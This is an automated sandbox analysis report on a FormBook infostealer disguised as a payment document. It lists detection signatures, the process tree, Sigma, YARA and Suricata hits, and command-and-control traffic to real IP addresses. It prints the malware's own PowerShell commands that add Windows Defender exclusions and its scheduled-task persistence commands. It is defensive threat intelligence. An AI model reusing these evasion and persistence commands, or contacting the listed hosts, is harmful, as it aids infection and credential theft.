Windows Analysis Report
PAYMENT SWIFT COPY.exe

Overview

General Information

Sample name: PAYMENT SWIFT COPY.exe
Analysis ID: 1618747
MD5: 5e69ebec05f9968afd7e3cfc81ad54c8
SHA1: ab2829123841c91e58a191338f924f3d5e86c41a
SHA256: 8d8bb9cc17e7e3bfda2630a37f1b8866fed36b43765ef579977684c7fcc6ee7b
Tags: exe, Formbook, Payment, user-cocaman

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PAYMENT SWIFT COPY.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe" MD5: 5E69EBEC05F9968AFD7E3CFC81AD54C8)
    • powershell.exe (PID: 7676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8040 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7804 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PAYMENT SWIFT COPY.exe (PID: 7964 cmdline: "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe" MD5: 5E69EBEC05F9968AFD7E3CFC81AD54C8)
      • drfYhRLxnrcfFY.exe (PID: 5856 cmdline: "C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\pS8cQ1dsti0k.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • xcopy.exe (PID: 1312 cmdline: "C:\Windows\SysWOW64\xcopy.exe" MD5: 7E9B7CE496D09F70C072930940F9F02C)
          • drfYhRLxnrcfFY.exe (PID: 2088 cmdline: "C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\9FhWekDMXDU.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7980 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
        • xcopy.exe (PID: 7940 cmdline: "C:\Windows\SysWOW64\xcopy.exe" MD5: 7E9B7CE496D09F70C072930940F9F02C)
  • NCchtKNKiPqC.exe (PID: 8032 cmdline: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe MD5: 5E69EBEC05F9968AFD7E3CFC81AD54C8)
    • schtasks.exe (PID: 7256 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmp1179.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NCchtKNKiPqC.exe (PID: 7284 cmdline: "C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe" MD5: 5E69EBEC05F9968AFD7E3CFC81AD54C8)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000014.00000002.4143260862.00000000057D0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000013.00000002.1987208170.0000000000110000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000F.00000002.4141273840.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.1867935515.0000000001810000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000E.00000002.4145888813.00000000067A0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
8.2.PAYMENT SWIFT COPY.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
8.2.PAYMENT SWIFT COPY.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", ParentImage: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe, ParentProcessId: 7508, ParentProcessName: PAYMENT SWIFT COPY.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", ProcessId: 7676, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmp1179.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmp1179.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe, ParentImage: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe, ParentProcessId: 8032, ParentProcessName: NCchtKNKiPqC.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmp1179.tmp", ProcessId: 7256, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Windows\SysWOW64\xcopy.exe", CommandLine: "C:\Windows\SysWOW64\xcopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xcopy.exe, NewProcessName: C:\Windows\SysWOW64\xcopy.exe, OriginalFileName: C:\Windows\SysWOW64\xcopy.exe, ParentCommandLine: "C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\pS8cQ1dsti0k.exe" , ParentImage: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe, ParentProcessId: 5856, ParentProcessName: drfYhRLxnrcfFY.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xcopy.exe", ProcessId: 1312, ProcessName: xcopy.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", ParentImage: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe, ParentProcessId: 7508, ParentProcessName: PAYMENT SWIFT COPY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp", ProcessId: 7804, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", ParentImage: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe, ParentProcessId: 7508, ParentProcessName: PAYMENT SWIFT COPY.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", ProcessId: 7676, ProcessName: powershell.exe

                Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe", ParentImage: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe, ParentProcessId: 7508, ParentProcessName: PAYMENT SWIFT COPY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NCchtKNKiPqC" /XML "C:\Users\user\AppData\Local\Temp\tmpFA76.tmp", ProcessId: 7804, ProcessName: schtasks.exe

                AV Detection

Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe, ReversingLabs: Detection: 27%
Source: PAYMENT SWIFT COPY.exe, Virustotal: Detection: 22%
Source: PAYMENT SWIFT COPY.exe, ReversingLabs: Detection: 27%
Source: Yara match, File source: 8.2.PAYMENT SWIFT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.PAYMENT SWIFT COPY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000014.00000002.4143260862.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000002.1987208170.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.4141273840.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.1867935515.0000000001810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000E.00000002.4145888813.00000000067A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.1867200881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.4141340650.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000D.00000002.1984565405.0000000002C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.4139835446.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000E.00000002.4141036989.00000000038E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.1869778786.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: PAYMENT SWIFT COPY.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PAYMENT SWIFT COPY.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: xcopy.pdbUGP, source: PAYMENT SWIFT COPY.exe, 00000008.00000002.1867547077.0000000001447000.00000004.00000020.00020000.00000000.sdmp, NCchtKNKiPqC.exe, 0000000D.00000002.1981731850.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, drfYhRLxnrcfFY.exe, 0000000E.00000002.4140397411.00000000008EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP, source: PAYMENT SWIFT COPY.exe, 00000008.00000002.1868118362.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000003.1867464774.0000000002B63000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4141524916.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000003.1869081225.0000000002D19000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4141524916.000000000305E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000003.1981470366.0000000002896000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000013.00000002.1987631254.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000002.1987631254.0000000002D9E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000003.1983090305.0000000002A4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb, source: PAYMENT SWIFT COPY.exe, PAYMENT SWIFT COPY.exe, 00000008.00000002.1868118362.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 0000000F.00000003.1867464774.0000000002B63000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4141524916.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000003.1869081225.0000000002D19000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000000F.00000002.4141524916.000000000305E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000003.1981470366.0000000002896000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000013.00000002.1987631254.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000002.1987631254.0000000002D9E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000013.00000003.1983090305.0000000002A4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: xcopy.pdb, source: PAYMENT SWIFT COPY.exe, 00000008.00000002.1867547077.0000000001447000.00000004.00000020.00020000.00000000.sdmp, NCchtKNKiPqC.exe, 0000000D.00000002.1981731850.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, drfYhRLxnrcfFY.exe, 0000000E.00000002.4140397411.00000000008EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb, source: drfYhRLxnrcfFY.exe, 0000000E.00000000.1789131434.00000000007BF000.00000002.00000001.01000000.0000000D.sdmp, drfYhRLxnrcfFY.exe, 00000014.00000002.4139832157.00000000007BF000.00000002.00000001.01000000.0000000D.sdmp
Source: C:\Windows\SysWOW64\xcopy.exe, Code function: 15_2_0053C850 FindFirstFileW,FindNextFileW,FindClose, 15_2_0053C850
Source: C:\Windows\SysWOW64\xcopy.exe, Code function: 4x nop then xor eax, eax, 15_2_00529EE0
Source: C:\Windows\SysWOW64\xcopy.exe, Code function: 4x nop then mov ebx, 00000004h, 15_2_032104CF

                Networking

Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 8.210.49.139:80
Source: Network traffic, Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49743 -> 8.210.49.139:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49788 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49823 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49823 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 8.210.49.139:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49804 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 8.210.49.139:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49747 -> 8.210.49.139:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49747 -> 8.210.49.139:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 199.59.243.228:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49742 -> 199.59.243.228:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49917 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49917 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49953 -> 162.0.213.94:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49970 -> 162.0.213.94:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49774 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50006 -> 162.0.213.94:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50006 -> 162.0.213.94:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49884 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49989 -> 162.0.213.94:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 144.76.229.203:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50036 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50036 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50028 -> 144.76.229.203:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 188.114.96.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50028 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50044 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50044 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49865 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50061 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50051 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50060 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50040 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50040 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50060 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50062 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50055 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50068 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50068 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50059 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50056 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50056 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50066 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50064 -> 3.33.130.190:80
